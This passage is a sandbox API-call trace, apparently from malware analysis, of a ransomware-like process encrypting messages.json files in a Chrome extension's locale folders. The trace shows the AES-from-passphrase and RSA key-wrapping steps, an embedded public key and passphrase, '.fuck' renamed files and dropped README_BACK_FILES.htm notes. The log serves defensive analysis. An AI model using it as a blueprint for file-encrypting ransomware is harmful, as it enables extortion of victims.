lpNumberOfBytesRead=0x2b9bc5c*=0x2a1, lpOverlapped=0x0) returned 1 [0259.181] CryptEncrypt (in: hKey=0x2e7c480, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2a1, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2b0) returned 1 [0259.181] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2b0, lpOverlapped=0x0) returned 1 [0259.183] CloseHandle (hObject=0x5d5c) returned 1 [0259.183] CloseHandle (hObject=0x5d60) returned 1 [0259.183] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json"), bFailIfExists=0) returned 1 [0259.190] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json", dwFileAttributes=0x0) returned 1 [0259.191] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.gsg")) returned 1 [0259.192] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.fuck")) returned 1 [0259.193] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.193] CryptDestroyKey (hKey=0x2e7c480) returned 1 [0259.193] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.193] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.193] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.194] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\readme_back_files.htm")) returned 0xffffffff [0259.194] AreFileApisANSI () returned 1 [0259.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.194] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.195] GetFileType (hFile=0x5d64) returned 0x1 [0259.195] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.196] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.196] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0259.196] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.196] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.196] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.197] GetLastError () returned 0x0 [0259.197] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json")) returned 0x20 [0259.197] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json", dwFileAttributes=0x80) returned 1 [0259.197] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.198] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.200] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.200] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.203] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.203] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.203] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.203] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c780) returned 1 [0259.203] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.203] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.203] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6c800) returned 1 [0259.204] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6c800, dwCertEncodingType=0x1, pInfo=0x2e286a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e286d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e286d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c540) returned 1 [0259.204] CryptEncrypt (in: hKey=0x2e7c540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.204] CryptEncrypt (in: hKey=0x2e7c540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6c888*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6c888*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.204] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6c888*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6c888*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.205] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x2b4, lpOverlapped=0x0) returned 1 [0259.207] CryptEncrypt (in: hKey=0x2e7c780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2b4, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2c0) returned 1 [0259.207] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2c0, lpOverlapped=0x0) returned 1 [0259.218] CloseHandle (hObject=0x5d60) returned 1 [0259.218] CloseHandle (hObject=0x5d5c) returned 1 [0259.218] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json"), bFailIfExists=0) returned 1 [0259.221] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json", dwFileAttributes=0x0) returned 1 [0259.222] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.gsg")) returned 1 [0259.223] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.fuck")) returned 1 [0259.224] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0259.224] CryptDestroyKey (hKey=0x2e7c780) returned 1 [0259.224] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.224] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.225] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0259.225] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\readme_back_files.htm")) returned 0xffffffff [0259.225] AreFileApisANSI () returned 1 [0259.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 158 [0259.225] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.226] GetFileType (hFile=0x5d64) returned 0x1 [0259.226] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.227] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.227] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.228] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.228] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.228] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.228] GetLastError () returned 0x0 [0259.228] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json")) returned 0x20 [0259.228] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json", dwFileAttributes=0x80) returned 1 [0259.229] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.230] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.232] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.232] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.234] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.234] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.235] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.235] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c440) returned 1 [0259.235] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.235] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.235] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6c910) returned 1 [0259.235] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6c910, dwCertEncodingType=0x1, pInfo=0x2e27800*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e27830*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e27838*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c480) returned 1 [0259.235] CryptEncrypt (in: hKey=0x2e7c480, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.235] CryptEncrypt (in: hKey=0x2e7c480, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6cff8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6cff8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.236] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6cff8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6cff8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.237] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x2c4, lpOverlapped=0x0) returned 1 [0259.238] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2c4, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2d0) returned 1 [0259.238] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2d0, lpOverlapped=0x0) returned 1 [0259.245] CloseHandle (hObject=0x5d5c) returned 1 [0259.245] CloseHandle (hObject=0x5d60) returned 1 [0259.245] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json"), bFailIfExists=0) returned 1 [0259.249] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json", dwFileAttributes=0x0) returned 1 [0259.249] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.gsg")) returned 1 [0259.250] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.fuck")) returned 1 [0259.251] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.251] CryptDestroyKey (hKey=0x2e7c440) returned 1 [0259.251] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.252] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.252] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.252] GetFileAttributesA 